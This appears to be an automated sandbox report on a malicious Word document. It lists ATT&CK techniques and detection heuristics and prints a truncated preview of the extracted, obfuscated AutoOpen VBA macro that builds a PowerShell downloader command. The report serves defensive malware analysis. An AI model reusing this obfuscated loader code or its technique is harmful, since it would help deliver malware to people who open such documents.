MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject and Shell calls to execute a second-stage payload. The script attempts to construct and execute a PowerShell command, indicating a downloader or dropper functionality.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9696 bytes |
SHA-256: 196e918f04112ad39e411aaa0f46eca82104254e7b706bddc65f0cf72342121f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "djcjdvvaZtdGm" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next MKczL = qwqzj - KwRHhC + (79367 + NLTTA + YjPQl * QtjsqJ - (54187 - viKvE + SqiWX - isEArJ)) zjQDsi = dJYXki - jToLW + (5951 + WrUan + ZLrMMH * ANcsVZ - (36741 - LsDTGn + miBtoj - ovdFoY)) tJjZMp = RSYQY - XifAXO + (93403 + iCttA + YpfBh * oXlBl - (68754 - sAYFG + KLOYAU - ziLGnj)) NPJPNw = ZOQESp - WuBrRa + (22378 + NSBJc + itaqq * HibQi - (94147 - bvkiDn + oMoFjG - tCrNDW)) bmWjKm = sdPnzE - Kzntp + (1244 + QfhmN + MiOFX * FZliWo - (45753 - Vuljv + iAJAmV - dLHpwz)) sSwRwRKCPNbvqO (juXhcE + tGCDDBEp + wVTFBFA) jhdur = wiPVA - bYCXzD + (7988 + Dcmwrq + LZRkA * jJVTRo - (79596 - prujD + DNzDo - WKGui)) pNbRj = TkIUaj - dkwWn + (48064 + FUKjw + cjCfa * hauUcV - (15524 - tDzLjr + YHPjj - cPVCrV)) End Sub Attribute VB_Name = "znJwlzp" Function juXhcE() On Error Resume Next DhfcF = (dwSsW + zViBf) * (PqFwY * pAuLm / bzwjNc * mICSr) wvAkmI = 51131 * miNFJ * nFfSM / RYcSIF - sKMYNB / XtAKZd SmIiwWn = "wershell " + " " + " " + " " + Chr(34) + "$" + Chr(40) + "Set" + "-ITEM '" + "VARIa" + "bLe:OF" + "S' ''" STHSM = 98547 * WAfQI * Thbji / OZGzDL - tEVtiS / NJzAm CfNTA = 97092 * SffbzC * jCwws / TiLvLB - ZJZdcI / ibkRp lnAko = 50958 * zfwjtn * oQlmv / QlGwlq - CiBlki / NOGMJT LVFJj = 68223 * iENLa * sYURI / DWIGCw - wRFRjI / THIFm HpXikp = 98902 * Tiswio * MTEGXF / BHwwtJ - ibtNo / jiRSW pZmHXwf = Chr(41) + Chr(34) + Chr(43) + " [St" + "rinG]" + Chr(40) + " '2" + "2M100!1" + "17p106B1" + "5!92%87i6" + "9@31!93@8" + "0%88p87@" + "81M70!18" + "%124n87S7" qFMSCB = 22306 * HSJqf * DPDKsl / dmjCQn - POijjW / Dujwpm dwGNZXNkHd = "0!28V10" + "1V87p8" + "0V113" + "S94M91" + "p87B92S" + "70V9B2" + "2p90p11" + "9S101%" + "15%21" + "n90i70" XRdiEs = 4164 * ijlNSf * lNZus / cKJFzV - ODwpf / JkmEhX GzEam = 58262 * dOdSb * AdpSRp / GtoMUU - ZZQwvq / RjJFvR wzkRk = 28892 * KcMLF * uHUdE / iNfiv - iVfwIs / fliKY lLHjWGkk = "%70B" + "66!8i2" + "9!29V" + "69n6" + "9n69p28" + "@65p70%95" + "p83i64%7" + "5M65%89" + "V83S64%" + "83V89" + "@93@94i94" BfhPX = 4003 * LtjEIN * sGSqz / zjXkn - ujNVXZ / lmjmE QwAFo = 56382 * zLLkwM * iCTJjc / jjJbZs - SdNYz / pjcwQB iVOOs = 93404 * HbRXq * bPOHfz / ccBFf - BiXRq / zVJmAi dFCLl = 62844 * ZRwdb * zKUIw / oHPzXM - DbXMTN / bZsiL SGHQJfZKHXm = "p75n28M" + "81@93" + "p95%29%" + "104n" + "65S125p" + "72%103i" LhslE = 82680 * TrzDU * MqiPkd / iwLzcD - ZXsiwr / Xcjoo JVZwP = 12226 * lRBRA * oNVsI / thvwQ - cZpOv / wNVYdm JaJDVKfsCAw = "64!29V1" + "14@90@70n" + "70V66!8@2" + "9%29S69" + "V69B" + "69%28i65" + "%64V91V9" + "5M83p9" inFrQz = 38320 * KGqfm * cOWIr / hiXWaU - CPkjpv / OtpHA afEYLJ = "0V83M" + "92!6" + "5M66M83" + "B64p87%6" + "5p28" + "%81n93" + "i95!29n8" + "8B90V11" iHFvJ = 81148 * KGdLaP * QjQwK / GaXAj - JiYPIj / izQQfK ESYFnm = 65201 * jMTjPw * mkCYD / dnFRi - uGRjzh / FSSQoK FdFiV = 78315 * dFqDw * wDjELb / KlqVbw - AASllO / BwSVN wabEdoz = "9p117M92S" + "70!29" + "S114i90p" + "70B70" + "n66B8@29" + "n29n" + "69S69B69" + "V28n6" + "5%91B" + "65M86" + "@87%81@" + "83B6" GRCwJ = 64849 * iSpqi * fTnEDn / OcWBdt - UUOOz / JjoPk OWrfI = 67361 * ECtPPJ * HVMiAi / nTFPc - WZRhqu / STWZS wjQIr = 7340 * mwdjGQ * EduAU / jpNEa - ZRzfXU / ZsfMNK lNfbhjcQ = "4%28" + "@81M9" + "3p29n74" + "S96B6" + "6S85%87n2" + "9%114%90!" + "70@70i66!" + "8@29n2" + "9%80i" + "83S71%70" + "!87S28V93" + "n64!85i" wlIFU = 87618 * KAfJvC * ClPfsX / lMYUIN - wnQszz / hzJIwl kENZj = 51814 * vORYcQ * OcPaP / UCpsW - wHRDT / bzKDi Ndddr = 35818 * HNZwRp * DmPDu / vzDOT - QqPrQ / JYwjl Bjzwr = 31821 * JmPIhL * jkLfw / NPRvD - UnGXvl / UKrUK TtPQk = "29%116i" + "0n4B98B1" + "07V71" + "%64@29!11" + "4B90" + "n70V70i66" + "i8p29M" + "29!69M69" + "p69V" pbBYrP = 98479 * vvjIWi * ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.